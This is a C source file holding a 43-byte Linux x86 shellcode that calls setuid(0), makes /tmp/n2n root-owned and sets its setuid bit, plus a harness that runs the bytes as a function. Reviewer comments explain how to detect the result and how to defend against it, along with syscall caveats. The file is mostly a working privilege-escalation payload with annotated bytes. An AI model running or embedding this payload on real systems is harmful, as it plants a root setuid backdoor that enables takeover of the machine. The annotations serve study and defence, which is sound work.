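/*
 * 43-byte linux x86 shellcode which does the following:
 *   setuid(0); chown("/tmp/n2n",0,0); chmod("/tmp/n2n", 04755); exit();
 *
 * by n2n, n2n@linuxmail.org,
 * Eye On Security Research Group - India, http://www.eos-india.net/
 *
 * Reviewer notes:
 *  - Net effect when every call succeeds: /tmp/n2n ends up owned by uid 0 /
 *    gid 0 with mode 04755, i.e. a root-owned setuid executable in a
 *    world-writable directory. setuid(0) only succeeds if the process that
 *    runs these bytes already has the privilege to become root.
 *  - Defensive view: the visible artefacts are a chown to 0:0 followed by a
 *    chmod that sets S_ISUID on a path under /tmp. Auditing chmod/chown
 *    calls that set the setuid bit, file-integrity checks for setuid files
 *    outside system directories, and mounting /tmp with nosuid all address
 *    the end state.
 *  - Syscall number 0x10 is lchown on current i386 kernels (chown moved to a
 *    different number); the original comment says chown.
 *  - Each call after the first loads only %al, so the sequence relies on the
 *    previous syscall having returned 0 in %eax.
 */
#include <stdio.h>

char shellcode[] =
    /* setuid(0): %eax = 0x17 (setuid), %ebx = 0 (uid) */
    "\x31\xc0"              // xor    %eax,%eax
    "\x31\xdb"              // xor    %ebx,%ebx
    "\xb0\x17"              // mov    $0x17,%al
    "\xcd\x80"              // int    $0x80

    /* chown("/tmp/n2n",0,0): path is built on the stack, %ecx = %edx = 0 */
    "\x31\xd2"              // xor    %edx,%edx
    "\x31\xc9"              // xor    %ecx,%ecx
    "\x52"                  // push   %edx          (string terminator)
    "\x68\x2f\x6e\x32\x6e"  // push   $0x6e326e2f   ("/n2n")
    "\x68\x2f\x74\x6d\x70"  // push   $0x706d742f   ("/tmp")
    "\x89\xe3"              // mov    %esp,%ebx     (%ebx -> "/tmp/n2n")
    "\xb0\x10"              // mov    $0x10,%al
    "\xcd\x80"              // int    $0x80

    /* chmod("/tmp/n2n", 04755): 0x9ed == 04755, %ebx still points at the path */
    "\x66\xb9\xed\x09"      // mov    $0x9ed,%cx
    "\xb0\x0f"              // mov    $0xf,%al
    "\xcd\x80"              // int    $0x80

    /*
     * exit(): %ebx is not cleared, so the exit status is the low byte of the
     * path pointer rather than 0.
     */
    "\x31\xc0"              // xor    %eax,%eax
    "\xb0\x01"              // mov    $0x1,%al
    "\xcd\x80"              // int    $0x80
    ;

/*
 * Test harness: calls the byte array above as if it were a function.
 *
 * The original wrote `(long) funct = &shellcode;`. A cast is not an lvalue in
 * C (that form was an old GCC extension that has since been removed), so the
 * pointer is now initialised with an explicit cast instead. Converting an
 * object pointer to a function pointer is itself outside ISO C and is kept
 * only because that is the whole purpose of the harness.
 *
 * shellcode[] is a writable data object; where data pages are mapped
 * non-executable, the call below faults instead of executing the bytes.
 */
int main(void)
{
    void (*funct)(void) = (void (*)(void))shellcode;

    funct();
    return 0; /* not reached when the payload runs: it ends in exit() */
}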